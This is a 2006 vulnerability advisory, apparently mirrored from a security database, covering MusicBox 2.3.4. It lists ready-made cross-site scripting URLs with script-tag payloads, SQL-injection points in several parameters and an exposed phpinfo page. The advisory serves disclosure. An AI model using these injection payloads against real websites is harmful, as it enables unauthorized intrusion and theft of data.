MusicBox <= 2.3.4 XSS SQL injection Vulnerability

2006-07-25T00:00:00

Description

MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script> http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists ------------- SQL injection ------------- http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org

{"id": "SECURITYVULNS:DOC:13612", "bulletinFamily": "software", "title": "MusicBox <= 2.3.4 XSS SQL injection Vulnerability", "description": "MusicBox 2.3.4\r\nhttp://www.musicboxv2.com\r\n------------\r\nPHPinfo page\r\n------------\r\n/phpinfo.php\r\n--------------------------\r\nCross Site Scripting (XSS)\r\n--------------------------\r\nhttp://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0\r\nhttp://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0\r\nhttp://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0\r\nhttp://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>\r\nhttp://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists\r\n-------------\r\nSQL injection\r\n-------------\r\nhttp://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]\r\nhttp://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists\r\nhttp://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]\r\n-----------------\r\nEllipsis Security\r\nhttp://www.ellsec.org", "published": "2006-07-25T00:00:00", "modified": "2006-07-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13612", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 35, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6399"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6399"]}]}, "exploitation": null, "vulnersScore": -0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645619300, "score": 1659803227}, "_internal": {"score_hash": "41702701f4b19384011a52aac980cb6c"}}

MusicBox &lt;= 2.3.4 XSS SQL injection Vulnerability

Description

MusicBox <= 2.3.4 XSS SQL injection Vulnerability